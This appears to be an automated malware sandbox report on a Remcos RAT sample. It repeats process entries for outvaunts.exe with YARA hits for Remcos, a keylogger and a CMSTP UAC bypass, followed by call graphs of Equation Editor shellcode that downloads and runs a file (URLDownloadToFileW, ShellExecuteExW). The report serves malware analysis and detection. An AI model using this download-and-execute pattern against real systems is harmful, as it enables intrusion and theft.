                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Has exited:true

                                                    General

                                                    Target ID:31
                                                    Start time:01:05:16
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Has exited:true

                                                    General

                                                    Target ID:32
                                                    Start time:01:05:17
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Has exited:true

                                                    General

                                                    Target ID:33
                                                    Start time:01:05:17
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Has exited:true

                                                    General

                                                    Target ID:34
                                                    Start time:01:05:18
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Has exited:true

                                                    General

                                                    Target ID:35
                                                    Start time:01:05:18
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Has exited:true

                                                    General

                                                    Target ID:36
                                                    Start time:01:05:19
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Has exited:true

                                                    General

                                                    Target ID:37
                                                    Start time:01:05:20
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Has exited:true

                                                    General

                                                    Target ID:38
                                                    Start time:01:05:21
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Has exited:true

                                                    General

                                                    Target ID:39
                                                    Start time:01:05:21
                                                    Start date:10/12/2024
                                                    Path:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\complacence\outvaunts.exe"
                                                    Imagebase:0x1360000
                                                    File size:832'512 bytes
                                                    MD5 hash:D6B16370CD4E60185AA88607316A0C05
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:10.1%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:51%
                                                      Total number of Nodes:104
                                                      Total number of Limit Nodes:3
                                                      execution_graph 1096 35c0314 1097 35c0315 1096->1097 1116 35c0332 ExitProcess 1097->1116 1139 35c034b 1116->1139 1140 35c0351 1139->1140 1159 35c0367 1140->1159 1160 35c036d 1159->1160 1179 35c038e 1160->1179 1180 35c0391 1179->1180 1181 35c03c0 15 API calls 1180->1181 1182 35c03a0 1181->1182 1203 35c0075 1204 35c0078 1203->1204 1205 35c0332 25 API calls 1204->1205 1208 35c0320 1205->1208 1206 35c0400 URLDownloadToFileW 1209 35c04aa 5 API calls 1206->1209 1210 35c03d9 1208->1210 1213 35c0388 1208->1213 1218 35c03a0 1208->1218 1212 35c049a 1209->1212 1210->1206 1211 35c0460 8 API calls 1210->1211 1211->1206 1214 35c04c1 3 API calls 1212->1214 1216 35c03c0 15 API calls 1213->1216 1215 35c04b1 1214->1215 1217 35c04c0 ShellExecuteExW 1215->1217 1220 35c0517 1215->1220 1216->1218 1219 35c04df ExitProcess 1217->1219 1221 35c04d3 1219->1221 1221->1220 1222 35c04e2 ExitProcess 1221->1222 1034 35c04e6 GetPEB 1035 35c04f4 1034->1035 1283 35c0067 1284 35c006c 1283->1284 1286 35c0071 1284->1286 1287 35c0076 1286->1287 1288 35c0332 25 API calls 1287->1288 1290 35c0320 1288->1290 1289 35c03a0 1290->1289 1291 35c03d9 1290->1291 1296 35c0388 1290->1296 1294 35c0460 8 API calls 1291->1294 1302 35c0400 URLDownloadToFileW 1291->1302 1293 35c04aa 5 API calls 1295 35c049a 1293->1295 1294->1302 1297 35c04c1 3 API calls 1295->1297 1299 35c03c0 15 API calls 1296->1299 1298 35c04b1 1297->1298 1300 35c04c0 ShellExecuteExW 1298->1300 1303 35c0517 1298->1303 1299->1289 1301 35c04df ExitProcess 1300->1301 1304 35c04d3 1301->1304 1302->1293 1303->1284 1304->1303 1305 35c04e2 ExitProcess 1304->1305 1036 35c03c0 1037 35c03c2 1036->1037 1040 35c03d5 LoadLibraryW 1037->1040 1055 35c03ef 1040->1055 1049 35c0400 URLDownloadToFileW 1069 35c04aa 1049->1069 1050 35c04c0 ShellExecuteExW 1084 35c04df 1050->1084 1052 35c03c7 1053 35c04d3 1053->1052 1054 35c04e2 ExitProcess 1053->1054 1056 35c03f2 1055->1056 1057 35c0460 8 API calls 1056->1057 1058 35c0400 URLDownloadToFileW 1057->1058 1060 35c04aa 5 API calls 1058->1060 1061 35c049a 1060->1061 1062 35c04c1 3 API calls 1061->1062 1063 35c04b1 1062->1063 1064 35c04c0 ShellExecuteExW 1063->1064 1066 35c03dc 1063->1066 1065 35c04df ExitProcess 1064->1065 1067 35c04d3 1065->1067 1066->1049 1086 35c0460 URLDownloadToFileW 1066->1086 1067->1066 1068 35c04e2 ExitProcess 1067->1068 1070 35c04ac 1069->1070 1071 35c04b1 1070->1071 1072 35c04c1 3 API calls 1070->1072 1073 35c04c0 ShellExecuteExW 1071->1073 1075 35c049a 1071->1075 1072->1071 1074 35c04df ExitProcess 1073->1074 1076 35c04d3 1074->1076 1078 35c04c1 1075->1078 1076->1075 1077 35c04e2 ExitProcess 1076->1077 1079 35c04c4 ShellExecuteExW 1078->1079 1080 35c04d3 1079->1080 1081 35c04df ExitProcess 1079->1081 1082 35c04e2 ExitProcess 1080->1082 1083 35c04b1 1080->1083 1081->1080 1083->1050 1083->1052 1085 35c04e2 ExitProcess 1084->1085 1087 35c049a 1086->1087 1088 35c04aa 5 API calls 1086->1088 1089 35c04c1 3 API calls 1087->1089 1088->1087 1090 35c04b1 1089->1090 1091 35c04c0 ShellExecuteExW 1090->1091 1093 35c0517 1090->1093 1092 35c04df ExitProcess 1091->1092 1094 35c04d3 1092->1094 1093->1049 1094->1093 1095 35c04e2 ExitProcess 1094->1095 1306 35c0020 1307 35c006c 1306->1307 1308 35c0071 28 API calls 1307->1308 1308->1307

                                                      Callgraph

                                                      • Executed
                                                      • Not Executed
                                                      • Opacity -> Relevance
                                                      • Disassembly available
                                                      callgraph 0 Function_035C04DF 1 Function_035C055F 2 Function_035C025F 3 Function_035C0314 3->0 12 Function_035C03C0 3->12 14 Function_035C04C1 3->14 19 Function_035C0332 3->19 21 Function_035C04AA 3->21 29 Function_035C0460 3->29 4 Function_035C0095 4->0 4->12 4->14 4->19 4->21 4->29 5 Function_035C03D5 5->0 5->14 20 Function_035C03EF 5->20 5->21 5->29 6 Function_035C0256 7 Function_035C024D 8 Function_035C050E 9 Function_035C038E 9->12 10 Function_035C008F 10->0 10->12 10->14 10->19 10->21 10->29 11 Function_035C034B 11->0 11->1 11->12 11->14 11->21 27 Function_035C0367 11->27 11->29 12->5 13 Function_035C0000 14->0 15 Function_035C0075 15->0 15->12 15->14 15->19 15->21 15->29 16 Function_035C0270 17 Function_035C0071 17->0 17->12 17->14 17->19 17->21 17->29 18 Function_035C00B1 18->0 18->12 18->14 18->19 18->21 18->29 19->0 19->11 19->12 19->14 19->21 19->29 20->0 20->14 20->21 20->29 21->0 21->14 22 Function_035C0164 23 Function_035C0025 24 Function_035C00E5 24->0 24->12 24->14 24->19 24->21 24->29 25 Function_035C04E6 25->8 26 Function_035C01E6 27->0 27->1 27->9 27->12 27->14 27->21 27->29 28 Function_035C0067 28->17 29->0 29->14 29->21 30 Function_035C0020 30->17 31 Function_035C00A0 31->0 31->12 31->14 31->19 31->21 31->29

                                                      Executed Functions

                                                      Function 035C03D5 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103libraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 35c03d5-35c03e1 LoadLibraryW call 35c03ef 3 35c0451-35c04b7 URLDownloadToFileW call 35c04aa call 35c04c1 0->3 4 35c03e3-35c044f call 35c0460 0->4 17 35c051e-35c0522 3->17 18 35c04b9-35c04be 3->18 4->3 20 35c054d-35c0556 17->20 21 35c0524 17->21 22 35c0517 18->22 23 35c04c0-35c04d6 ShellExecuteExW call 35c04df 18->23 25 35c051a-35c051d 20->25 26 35c0528 21->26 22->25 23->26 40 35c04d8 23->40 29 35c051f-35c0522 25->29 30 35c0558 25->30 31 35c052a-35c052e 26->31 32 35c0530-35c0534 26->32 29->20 29->21 35 35c055b-35c055c 30->35 31->32 36 35c053c-35c0543 31->36 37 35c0549-35c054b 32->37 38 35c0536-35c053a 32->38 41 35c0545 36->41 42 35c0547 36->42 37->35 38->36 38->37 40->37 43 35c04da-35c04e4 ExitProcess 40->43 41->37 42->20
                                                      APIs
                                                      • LoadLibraryW.KERNEL32(035C03C7), ref: 035C03D5
                                                        • Part of subcall function 035C03EF: URLDownloadToFileW.URLMON(00000000,035C0400,?,00000000,00000000), ref: 035C0462
                                                        • Part of subcall function 035C03EF: ShellExecuteExW.SHELL32(0000003C), ref: 035C04CC
                                                        • Part of subcall function 035C03EF: ExitProcess.KERNEL32(00000000), ref: 035C04E4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.456215028.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
                                                      • String ID: <
                                                      • API String ID: 2508257586-4251816714
                                                      • Opcode ID: acb405e6523e7e5d710134262fc59b98716de2e8e005ee7d025e1562b2a4cb46
                                                      • Instruction ID: 41994df1281338b5a73760b267789e591a560ef66283f5d84b570bb22a9bf580
                                                      • Opcode Fuzzy Hash: acb405e6523e7e5d710134262fc59b98716de2e8e005ee7d025e1562b2a4cb46
                                                      • Instruction Fuzzy Hash: 6231D2A141D3C5AFC712D3B06CAD6A6BFA47F92108F0E8ACED0860B0F3D668C505C716
                                                      Function 035C034B Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 166filenetworkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 46 35c034b-35c0361 call 35c055f call 35c0367 53 35c03c9-35c03d3 46->53 54 35c0364 46->54 55 35c03d9-35c03e1 54->55 56 35c0366-35c037e 54->56 59 35c0451-35c04b7 URLDownloadToFileW call 35c04aa call 35c04c1 55->59 60 35c03e3-35c03f6 55->60 65 35c03ef-35c03f6 56->65 66 35c0380-35c0384 56->66 80 35c051e-35c0522 59->80 81 35c04b9-35c04be 59->81 63 35c03fa-35c044f call 35c0460 60->63 63->59 65->63 66->55 69 35c0386 66->69 69->63 72 35c0388-35c03c6 call 35c03c0 69->72 72->53 84 35c054d-35c0556 80->84 85 35c0524 80->85 86 35c0517 81->86 87 35c04c0-35c04d6 ShellExecuteExW call 35c04df 81->87 90 35c051a-35c051d 84->90 91 35c0528 85->91 86->90 87->91 107 35c04d8 87->107 95 35c051f-35c0522 90->95 96 35c0558 90->96 97 35c052a-35c052e 91->97 98 35c0530-35c0534 91->98 95->84 95->85 102 35c055b-35c055c 96->102 97->98 103 35c053c-35c0543 97->103 104 35c0549-35c054b 98->104 105 35c0536-35c053a 98->105 108 35c0545 103->108 109 35c0547 103->109 104->102 105->103 105->104 107->104 110 35c04da-35c04e4 ExitProcess 107->110 108->104 109->84
                                                      APIs
                                                      • URLDownloadToFileW.URLMON(00000000,035C0400,?,00000000,00000000), ref: 035C0462
                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 035C04CC
                                                      • ExitProcess.KERNEL32(00000000), ref: 035C04E4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.456215028.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: DownloadExecuteExitFileProcessShell
                                                      • String ID: <
                                                      • API String ID: 3584569557-4251816714
                                                      • Opcode ID: 37ba51a60fdad5dd0a1149ff8e894f8a0c7cda670b883d4044c3a09a7c9394e0
                                                      • Instruction ID: a9d6413e1ba1620200b2315350285daf0b3b5f6626697ee62ce32a3270a658e9
                                                      • Opcode Fuzzy Hash: 37ba51a60fdad5dd0a1149ff8e894f8a0c7cda670b883d4044c3a09a7c9394e0
                                                      • Instruction Fuzzy Hash: 9551DCA582D3C5AFC712D7B06DA969ABF60BB43508F0D8ACFC4864B0F3D6A8D505C316
                                                      Function 035C0367 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 147filenetworkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 113 35c0367-35c037e call 35c055f call 35c038e 120 35c03ef-35c03f6 113->120 121 35c0380-35c0384 113->121 127 35c03fa-35c044f call 35c0460 120->127 122 35c03d9-35c03e1 121->122 123 35c0386 121->123 124 35c0451-35c04b7 URLDownloadToFileW call 35c04aa call 35c04c1 122->124 125 35c03e3-35c03f6 122->125 126 35c0388-35c03d3 call 35c03c0 123->126 123->127 146 35c051e-35c0522 124->146 147 35c04b9-35c04be 124->147 125->127 127->124 150 35c054d-35c0556 146->150 151 35c0524 146->151 152 35c0517 147->152 153 35c04c0-35c04d6 ShellExecuteExW call 35c04df 147->153 156 35c051a-35c051d 150->156 157 35c0528 151->157 152->156 153->157 170 35c04d8 153->170 160 35c051f-35c0522 156->160 161 35c0558 156->161 162 35c052a-35c052e 157->162 163 35c0530-35c0534 157->163 160->150 160->151 165 35c055b-35c055c 161->165 162->163 166 35c053c-35c0543 162->166 167 35c0549-35c054b 163->167 168 35c0536-35c053a 163->168 171 35c0545 166->171 172 35c0547 166->172 167->165 168->166 168->167 170->167 173 35c04da-35c04e4 ExitProcess 170->173 171->167 172->150
                                                      APIs
                                                      • URLDownloadToFileW.URLMON(00000000,035C0400,?,00000000,00000000), ref: 035C0462
                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 035C04CC
                                                      • ExitProcess.KERNEL32(00000000), ref: 035C04E4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.456215028.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: DownloadExecuteExitFileProcessShell
                                                      • String ID: <
                                                      • API String ID: 3584569557-4251816714
                                                      • Opcode ID: a66852f5c9915e446062b56caf918945e182ec7432ea87c41f84fcdb0008044b
                                                      • Instruction ID: 7e36079775655479b767fedaf0187fff18d05a2c9122b9c34e714356ddecffc0
                                                      • Opcode Fuzzy Hash: a66852f5c9915e446062b56caf918945e182ec7432ea87c41f84fcdb0008044b
                                                      • Instruction Fuzzy Hash: E841DCA682D3C5AFC712D7B06DA969ABF60BB42108F0D8ACFD4864B0F3D668D505C356
                                                      Function 035C03EF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
